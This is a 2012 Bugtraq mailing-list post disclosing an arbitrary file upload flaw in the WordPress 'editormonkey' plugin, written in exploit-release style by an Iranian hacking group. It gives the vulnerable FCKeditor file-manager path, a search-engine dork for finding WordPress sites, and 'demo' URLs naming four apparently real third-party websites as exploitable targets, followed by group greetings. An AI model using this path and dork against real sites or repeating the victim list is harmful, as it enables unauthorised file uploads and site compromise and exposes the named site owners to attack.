
Date: Wed, 4 Jul 2012 14:36:06 GMT
From: Amir@...st.ir
To: bugtraq@...urityfocus.com
Subject: Wordpress (editormonkey) Arbitrary File Upload Vulnerability

a bug in Wordpress (editormonkey)that allows to us to occur a File Upload on a Remote machin.







########################################################################################
#
# Exploit Title : Wordpress (editormonkey) Arbitrary File Upload Vulnerability
#
# Author        : IrIsT.Ir
#
# Discovered By : Am!r
#
# Home          : http://IrIsT.Ir/forum
#
# Software Link : http://wordpress.org
#
# Security Risk : High
#
# Version       : All Version
#
# Tested on     : GNU/Linux Ubuntu - Windows Server - win7
#
# Dork          : intext:"Powered By Wordpress"
#
########################################################################################
#
#  Expl0iTs :
#
#  http://target.com/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/browser/default/browser.html
#
#
# D3mo :
#
# atghope.org/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/browser/default/browser.html
#
# mayed.info/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/browser/default/browser.html
#
# nadishana.com/blogeng/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/browser/default/browser.html
#
# ultimatewarrior.com/warriorsmachete/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/browser/default/browser.html
#
########################################################################################
#
# Greats : B3HZ4D - Crim3R - nimaarek - 0x0ptim0us - Net.Edit0r - A.Cr0x - G3n3rall - 
#
# R3ZA BLACK HAT - TaK.FaNaR - m3hdi - F@rid - joker_s - H4x0r - dr.tofan - skote_vahshat - 
#
# d3c0d3r - Dr.Security - Mr.Xpr - Bl4ck_king - hellboy - Shekaf & All Members In IrIsT.Ir
#
########################################################################################
